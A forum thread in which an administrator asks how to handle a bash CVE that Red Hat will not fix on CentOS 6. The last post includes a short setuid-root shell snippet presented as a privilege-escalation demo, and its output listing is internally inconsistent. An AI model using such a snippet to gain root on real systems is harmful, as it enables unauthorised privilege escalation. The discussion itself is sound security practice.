Maintain latest security fixes

Support for security such as Firewalls and securing linux
s0ke
Posts: 11
Joined: 2015/02/13 18:55:50

Maintain latest security fixes

Postby s0ke » 2017/02/14 20:53:21

I'm looking for guidance really on what's the best practice to maintain latest security fixes in upstream packages on top of our base 6.8 packages.

So for example. Our security czar is saying we need to have bash version 4.4 or greater. Well the cent 6 repos latest version is 4.1.2-40. The Redhat CVE says CVE 2016-7543 will not be fixed. https://access.redhat.com/security/cve/cve-2016-7543. I realize we could build bash from source and add it to our system, but I really don't want to maintain that. I personally go with what Redhat has in their CVE/RHCSAs. Now on the flipside of that. I see where they (security) is coming from. If they were able to present me with actual hard data that they exploited said CVE. Then I may say OK lets build bash from source and move on. However this makes my life harder when it comes to maintenance.

Any pointers or is it pretty much just yum update and wait for fixes to trickle downstream? Or are there other possible avenues. Hopefully that makes sense.

Thanks

Whoever
Posts: 964
Joined: 2013/09/06 03:12:10

Re: Maintain latest security fixes

Postby Whoever » 2017/02/16 02:39:06

Perhaps this is the most important information about that CVE:
http://www.securityfocus.com/bid/93183/exploit
Currently, we are not aware of any working exploits.

s0ke
Posts: 11
Joined: 2015/02/13 18:55:50

Re: Maintain latest security fixes

Postby s0ke » 2017/02/17 14:44:57

It's more of a means of privilege escalation.

Code: Select all

[bob@box1 ~]$ gcc -xc - -oescu <<< 'int main() { setuid(0); system("/bin/sh"); }'
[bob@box1 ~]$ chmod 4755 ./escu
[bob@box1 ~]$ ls -l ./escu
-rwsr-xr-x. 1 bob bob 6543 Feb 14 16:50 ./escu
[box@box1 ~]$ ./esc
sh-4.1# whoami
root


The way I see it though it only works for users who already have sudo access. So if an account is compromised that has sudo in my opinion it's pretty much game over at that point anyway. This is just an easy way to escalate privileges w/o the need to grab a hash or use some other password cracking method.